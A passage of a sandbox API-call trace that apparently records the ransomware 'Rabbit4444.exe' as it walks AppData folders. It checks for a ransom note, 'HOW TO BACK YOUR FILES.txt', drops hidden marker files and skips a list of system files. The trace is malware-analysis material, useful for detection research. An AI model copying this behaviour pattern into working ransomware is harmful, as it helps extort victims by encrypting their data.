ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.789] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.789] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.789] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.789] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.789] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.789] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefef8aee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefef8aee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.790] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.790] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.790] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefef8aee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefef8aee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefef8aee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.790] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.790] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.790] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.790] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.790] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.791] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.791] CloseHandle (hObject=0x2a0) returned 1 [0064.791] CloseHandle (hObject=0x2cc) returned 1 [0064.791] GetCurrentThreadId () returned 0xd98 [0064.791] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0064.791] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache" [0064.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116040 | out: hHeap=0xe0000) returned 1 [0064.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0064.791] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache" [0064.791] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\" [0064.791] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0064.791] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.792] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.794] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.795] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.795] CloseHandle (hObject=0x2cc) returned 1 [0064.796] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache") returned 96 [0064.796] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.796] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.796] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.796] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.796] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.796] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.796] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.796] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.796] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.796] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.796] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.796] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeff1e821, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeff1e821, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.796] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.796] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.796] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeff1e821, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeff1e821, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.796] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.796] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.796] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.797] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.797] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.797] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.798] CloseHandle (hObject=0x2a0) returned 1 [0064.798] CloseHandle (hObject=0x2cc) returned 1 [0064.798] GetCurrentThreadId () returned 0xd98 [0064.798] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11d008 [0064.798] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" [0064.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0064.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d000 | out: hHeap=0xe0000) returned 1 [0064.798] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" [0064.798] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\" [0064.798] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0064.798] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.799] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.802] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.802] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.803] CloseHandle (hObject=0x2cc) returned 1 [0064.803] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned 90 [0064.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.803] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd6e44f49, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.803] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.803] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.803] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.803] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd6e44f49, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.803] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.804] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.804] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.804] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.804] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.804] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeff1e821, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeff1e821, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeff1e821, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.804] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.804] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.804] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37a7aa93, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x37a7aa93, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0064.804] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0064.804] lstrcpyW (in: lpString1=0x130ebee, lpString2="AC" | out: lpString1="AC") returned="AC" [0064.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0064.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0064.805] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x11cda8 [0064.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6b7054, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c98f9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a6b7054, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0064.805] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0064.805] lstrcpyW (in: lpString1=0x130ebee, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0064.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0064.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116ad0 [0064.805] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122268 [0064.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca0e8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a690dfe, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0064.805] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0064.805] lstrcpyW (in: lpString1=0x130ebee, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0064.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0064.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108688 [0064.805] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122308 [0064.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca805, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a66aba6, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0064.805] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0064.806] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0064.806] lstrcpyW (in: lpString1=0x130ebee, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0064.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0064.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0064.806] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122188 [0064.806] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12cb203, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a66aba6, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0064.806] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0064.806] lstrcpyW (in: 